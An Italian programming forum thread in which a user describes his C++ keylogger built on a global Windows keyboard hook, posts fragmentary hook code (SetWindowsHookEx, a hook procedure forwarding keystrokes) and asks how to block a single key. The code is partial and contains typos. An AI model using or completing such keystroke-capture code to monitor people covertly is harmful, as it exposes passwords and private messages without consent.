Visualizzazione dei risultati da 1 a 5 su 5
  1. #1

    Controllare tastiera

    Ciao a tutti.
    In un mio programma in c++ sn riuscito a creare un hook alla tastiera ed ora sn in grado di registrare su un file tutto quello che viene scritto sulla tastiera anche se il mio prog nn ha il focus (un keylogger insomma)....ora volevo chiedervi se sapevate dirmi un modo per riuscire a controllare ogni evento della tastiera ad esempio disabilitare un solo tasto della tastiera.
    Sapete dirmi come posso fare?
    Grazie ciao

  2. #2
    Utente di HTML.it L'avatar di MMarzia
    Registrato dal
    Mar 2001
    Messaggi
    1,781
    immagino serva il consenso all'installazione perchč il tutto sia legale..

    comunque da regolamente specifica il linguaggio nel titolo del 3d
    io sono festosamente cicciottello :: e. cartman

    t'amo senza sapere come, nč quando nč da dove,
    t'amo direttamente senza problemi nč orgoglio:
    cosė ti amo perchč non so amare altrimenti

  3. #3
    Utente di HTML.it L'avatar di Xadoom
    Registrato dal
    Dec 2002
    Messaggi
    1,491
    Se stai programmando con le API di windows masta che gestisci il messaggio WM_KEYDOWN
    Windows Xp
    [Java]
    [PHP]Notepad++
    [Fortran90-77] elf90 g77
    [C++ /WinAPI] DevC++ VisualC++

  4. #4
    Ciao di nuovo.
    Probabilmente nn mi sn spiegato molto bene....in pratica il mio prog grazie all'hook prende il messaggio del tasto pigiato lo scrive sul file che ho scelto io....perō anche il sistema fa la stessa cosa in modo che scrivendo le lettere cmq appaiano sullo schermo.
    Ora la mia domanda č sapete dirmi un modo per impedire al sistema di eseguire le sue operazioni?
    Preciso che il mio prog funziona anche quando nn ha il focus.
    Grazie ciao

  5. #5
    Ciao. Ho creato un piccolo key log composto da un dll e da un exe. Il dll č formato da 3 funzioni che sn:
    void installhook(HWND h)
    {
    hook = NULL;
    hwnd = h;
    hook = SetWindowsHookEx(WH_KEYBOARD,hookproc,hi
    nstance,NULL);
    }
    void removehook()
    {
    UnhookWindowsHookEx(hook);
    }
    LRESULT CALLBACK hookproc(int ncode,WPARAM wparam,LPARAM lparam)
    {
    if(ncode>=0)
    {
    if((lparam & 0x80000000) == 0x00000000)
    {
    hwnd = FindWindow("#32770","Keylogger Exe"); PostMessag(hwnd,WM_USER+755,wparam,lpara
    m); }
    }
    return ( CallNextHookEx(hook,ncode,wparam,lparam)
    );
    }
    }
    In questo modo salva tutti i tasti premuti in un file txt. Ora volevo chiedervi come posso disabilitare un tasto della tastiera?? Credo bisogni modificare la funz hookproc ma nn so come
    Grazie ciao

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.